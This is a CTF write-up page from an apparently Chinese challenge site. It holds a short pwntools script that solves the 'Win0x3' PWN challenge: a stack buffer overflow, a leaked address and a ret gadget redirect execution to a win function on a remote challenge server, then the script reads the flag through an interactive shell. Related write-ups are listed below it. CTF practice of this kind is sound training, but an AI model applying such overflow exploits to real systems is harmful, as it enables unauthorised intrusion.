投稿赚金币

Win0x3

1000x_ 2025-11-14 09:22:41 128 0 返回题目详情

from pwn import *
host = '49.232.142.230'
port = 10684
p = remote(host, port)

elf = ELF("./pwn")
rop = ROP(elf)

ret = rop.find_gadget(['ret']).address

p.recvuntil(b'challenge. ')
leak = int(p.recv(14), 16)
log.info(f"leak --> {hex(leak)}")

payload = b'a'*(0x50 + 0x8) + p64(leak - 0x1179 + ret) + p64(leak)

p.sendline(payload)

p.sendline(b'cat flag.txt')

p.interactive()


分类:PWN
...
登录回复
image
作者:1000x_

9

提交

0

收入

相关WriteUP

  • Format.INI

    1.用file查看文件类型:64位ELFnostripped2.checksec查看文件开启保护:GOT可劫持非PIE3.IDA分析文件:prinf格式化漏洞4.分析代码,程序调用了system,printf之后调用了free。查看freegot表的内容为0x401036与systemplt的地址0x401060就差最后一个字节。那么想法修改freegot的内容为system的plt。而free的...

    • PWN
    • 2年前
  • 勇闯迷宫-过三关 (陕西省大学生)

    这题如题面所说分为三个部分,难度不高,第一部分考栈溢出,第二部分有点简单的逆向,第三部分考了一点fastbinattack,作为复习基础知识刚刚好拿到程序,首先做些基本检查:PartialRELRO,有Canary和NX,没有PIE。提供了libc(2.23)。got表里函数挺多,特别是看到了malloc和free,可能要用到堆。全局变量和main基本都保留了符号表,其他函数大多没有。第一部分直接...

    • PWN
    • 2年前
  • [NUAACTF-2017]hello_pwn

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • PWN
    • 1年前
  • No Way Out的writeup

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • PWN
    • 1年前
  • Message Board的writeup

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • PWN
    • 1年前
问题反馈